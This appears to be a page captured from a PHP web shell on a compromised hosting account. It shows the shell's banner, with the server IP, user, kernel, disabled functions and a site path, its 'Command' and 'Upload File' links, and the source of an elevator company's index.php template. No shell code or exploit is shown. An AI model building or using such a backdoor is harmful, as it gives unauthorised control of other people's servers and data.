Server IP : 103.53.40.154 / Your IP : 3.135.204.43 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/fastelevatorandescalator.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1"> <?php include "top-links.php" ?> <title><?php echo $data1["meta_title"];?></title> <meta name="description" content="<?php echo $data1["meta_desc"];?>"> </head> <body class=""> <div class="page-wrapper"> <?php include "top-header.php";?> <?php include "header.php";?> <?php //include "video.php";?> <?php include "slider.php";?> <?php include "index-about.php";?> <?php // include "index-cat.php" ?> <?php // include "index-mini-sli.php"; ?> <?php include "Index-products.php";?> <?php include "index-why-us.php";?> <?php include "index-gallery.php";?> <?php include "index-testi.php";?> <?php // include "index-team.php"; ?> <?php include "index-faq-contact.php";?> <?php // include "index-blog.php" ?> <?php // include "index-clients.php"; ?> <?php // include "index-award-cer.php"; ?> </div> <?php include "footer.php";?> </body> </html> <?php }else{ echo $data['message']; } ?>